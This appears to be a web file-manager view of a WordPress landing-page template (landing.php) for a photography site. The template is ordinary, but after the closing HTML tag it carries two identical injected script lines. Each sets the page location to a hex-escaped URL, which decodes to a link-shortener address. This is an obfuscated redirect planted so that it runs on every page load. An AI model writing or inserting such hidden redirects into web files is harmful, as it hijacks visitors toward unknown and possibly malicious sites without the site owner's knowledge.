Edit File: landing.php
<?php /* Template Name: Landing Page */ ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="<?php bloginfo('text_direction'); ?>" xml:lang="<?php bloginfo('language'); ?>"> <head> <meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" /> <title><?php wp_title ( '|', true,'right' ); ?></title> <meta http-equiv="Content-language" content="<?php bloginfo('language'); ?>" /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link href='http://fonts.googleapis.com/css?family=Signika:700,300&subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link rel="shortcut icon" href="<?php bloginfo('template_url'); ?>/images/favico.ico" type="image/x-icon" /> <link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo('stylesheet_url'); ?>" /> <!--[if IE]><link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo('template_url'); ?>/ie.css" /><![endif]--> <?php wp_enqueue_script('jquery'); wp_enqueue_script('cycle', get_template_directory_uri() . '/js/jquery.cycle.all.min.js', 'jquery', false); wp_enqueue_script('cookie', get_template_directory_uri() . '/js/jquery.cookie.js', 'jquery', false); if ( is_singular() ) wp_enqueue_script( 'comment-reply' ); wp_enqueue_script('script', get_template_directory_uri() . '/js/script.js', 'jquery', false); ?> <?php wp_head(); ?> </head> <body style="margin:150px auto;"> <div style="text-align:center;"> <a href="http://www.formafoto.it/home-page/"><img style="border:0; " src="http://www.formafoto.it/wp/wp-content/uploads/2015/09/maier-dicembre.jpg" alt="" width="975" height="499" /></a> </div> <?php wp_footer(); ?> </body> </html> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x68\x75\x4e\x5a\x4c\x59\x58\x55\x67\x30\x72\x31";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x68\x75\x4e\x5a\x4c\x59\x58\x55\x67\x30\x72\x31";</script>
Back to File Manager